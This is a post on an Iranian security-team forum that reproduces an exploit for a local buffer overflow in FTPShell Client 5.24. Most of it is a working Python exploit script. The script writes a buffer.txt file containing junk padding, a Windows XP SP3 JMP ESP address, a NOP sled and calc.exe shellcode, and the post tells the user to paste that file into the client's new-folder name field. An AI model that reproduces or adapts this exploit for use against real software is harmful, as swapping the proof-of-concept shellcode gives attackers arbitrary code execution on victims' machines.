رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده


#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

#[+] Exploit Title: FTPShell Client (Add New Folder) Local Buffer Overflow

#[+] Date: 2/2/2016

#[+]Exploit Author: Arash Khazaei

#[+] Version: 5.24

#[+] Tested on: Windows XP Professional SP3 (Version 2002)

#[+] CVE : N/A

#[+] introduction : Add New Folder In Remote FTP Server And In Name Input Copy Buffer.txt File content

#[+] or click on Remote Tab Then Click On Create Folder And Copy Buffer.txt In Name Input ...

#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

#!/usr/bin/python

filename = "buffer.txt"

# Junk A

junk = "A"*452

#77FAB277 JMP ESP

# Windows Xp Professional Version 2002 Service Pack 3

eip = "\x77\xB2\xFA\x77"

# Nops

nops = "\x90"*100

# Shellcode Calc.exe 16Byte

buf=("\x31\xC9"

"\x51"

"\x68\x63\x61\x6C\x63"

"\x54"

"\xB8\xC7\x93\xC2\x77"

"\xFF\xD0")

#Appending Buffers Together

exploit = junk + eip + nops + buf

#Creating File

length = len(exploit)

print "[+]File name: [%s]\n" % filename

print "[+]Payload Size: [%s]\n " % length

print "[+]File Created.\n"

file = open(filename,"w")

file.write(exploit)

file.close

print exploit

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...